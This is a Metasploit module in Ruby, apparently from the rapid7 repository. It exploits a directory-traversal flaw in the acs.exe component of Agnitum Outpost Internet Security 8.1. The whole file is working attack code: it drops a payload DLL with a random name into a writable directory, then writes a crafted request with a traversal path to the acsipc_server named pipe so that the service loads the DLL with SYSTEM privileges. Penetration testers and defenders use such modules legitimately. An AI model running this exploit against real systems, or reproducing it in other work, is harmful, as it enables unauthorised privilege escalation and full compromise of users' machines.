GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/agnitum_outpost_acs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
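class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Exploit::FileDropper

  # IPC pipe exposed by the vulnerable acs.exe component. Opening it is the
  # only thing +check+ does; +exploit+ writes one request to it.
  ACS_PIPE = "\\\\.\\pipe\\acsipc_server".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Agnitum Outpost Internet Security Local Privilege Escalation',
          'Description' => %q{
            This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
            Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load
            arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
            code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with
            Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Ahmad Moghimi', # Vulnerability discovery
            'juan vazquez' # MSF module
          ],
          'Arch' => [ARCH_X86, ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'Privileged' => true,
          'Targets' => [
            [ 'Agnitum Outpost Internet Security 8.1', {} ],
          ],
          'Payload' => {
            'Space' => 2048,
            'DisableNops' => true
          },
          'References' => [
            [ 'CVE', '2013-10046' ],
            [ 'OSVDB', '96208' ],
            [ 'EDB', '27282' ]
          ],
          'DisclosureDate' => '2013-08-02',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_railgun_api
                stdapi_sys_config_getenv
              ]
            }
          },
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )

    register_options([
      # OptString rather than OptPath: this is a *remote* path, so it cannot be
      # validated against the local filesystem.
      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
      # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
    ])
  end

  # Four random bytes as a little-endian DWORD; used as filler in the request.
  #
  # @return [Integer]
  def junk
    rand_text_alpha(4).unpack("V").first
  end

  # Opens +pipe+ for read/write on the target via railgun.
  #
  # @param pipe [String] Win32 pipe path (e.g. ACS_PIPE)
  # @return [Integer, nil] the HANDLE, or nil when CreateFileA failed
  def open_named_pipe(pipe)
    # INVALID_HANDLE_VALUE is all-ones at the native pointer width; a 64-bit
    # meterpreter hands back an 8-byte HANDLE, so accept both encodings.
    invalid_handle_values = [0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF]

    r = session.railgun.kernel32.CreateFileA(
      pipe,
      "GENERIC_READ | GENERIC_WRITE",
      0x3, # FILE_SHARE_READ | FILE_SHARE_WRITE
      nil,
      "OPEN_EXISTING",
      "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL",
      0
    )
    handle = r['return']

    return nil if invalid_handle_values.include?(handle)

    handle
  end

  # Sends the DLL-load request for +dll_name+ (located in +dll_path+) to the
  # already-opened pipe +handle+.
  #
  # @param handle [Integer] HANDLE returned by +open_named_pipe+
  # @param dll_path [String] absolute directory the DLL was dropped into
  # @param dll_name [String] file name of the dropped DLL
  # @return [Integer, nil] bytes written, or nil when WriteFile failed
  def write_named_pipe(handle, dll_path, dll_name)
    # Strip the drive letter and prefix DEPTH levels of "..\" so the path
    # resolves relative to the directory acs.exe runs from.
    traversal_path = "..\\" * datastore["DEPTH"]
    traversal_path << dll_path.gsub(/\A[a-zA-Z]+:\\/, "")
    traversal_path << "\\#{dll_name}"

    path = Rex::Text.to_unicode(traversal_path)

    data = "\x00" * 0x11
    data << path
    data << "\x00\x00"
    data << "\x00\x00\x00"

    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
    buf << [0x17].pack("V") # command
    buf << [junk].pack("V")
    buf << [data.length].pack("V")
    buf << [0, 0, 0].pack("V*")
    buf << data

    # The integer 4 asks railgun to allocate a 4-byte out buffer for lpNumberOfBytesWritten.
    w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)

    # The target of this write is the pipe handle, not a file on disk.
    unless w['return']
      print_error("There was an error writing to the named pipe")
      return nil
    end

    w['lpNumberOfBytesWritten']
  end

  # Non-destructive check: opens and immediately closes the acs.exe pipe.
  # Pipe presence shows the service is running but says nothing about its
  # version, hence Detected rather than Vulnerable.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    handle = open_named_pipe(ACS_PIPE)
    return Exploit::CheckCode::Safe if handle.nil?

    session.railgun.kernel32.CloseHandle(handle)
    Exploit::CheckCode::Detected
  end

  # Drops the payload DLL (random name, registered for cleanup) into
  # WritableDir or %TEMP%, then asks acs.exe to load it through the pipe.
  # The pipe handle is closed on every exit path.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the pipe is missing,
  #   the directory is unusable, the DLL cannot be written, or the pipe write fails
  def exploit
    print_status("Opening named pipe...")
    handle = open_named_pipe(ACS_PIPE)
    fail_with(Failure::NoTarget, "#{ACS_PIPE} named pipe not found") if handle.nil?
    print_good("#{ACS_PIPE} found! Proceeding...")

    temp_dir = datastore["WritableDir"]
    if temp_dir.nil? || temp_dir.empty?
      temp_dir = client.sys.config.getenv('TEMP')
    end

    print_status("Using #{temp_dir} to drop malicious DLL...")
    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
    end

    print_status("Writing malicious DLL to remote filesystem")
    write_path = pwd
    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
    begin
      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
      write_file(dll_name, generate_payload_dll)
      register_file_for_cleanup("#{write_path}\\#{dll_name}")
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::BadConfig, "Failed to drop payload into #{temp_dir}")
    end

    print_status("Exploiting through #{ACS_PIPE}...")
    bytes = write_named_pipe(handle, write_path, dll_name)
    session.railgun.kernel32.CloseHandle(handle)

    fail_with(Failure::Unknown, "Failed while writing to #{ACS_PIPE}") if bytes.nil?
  end
end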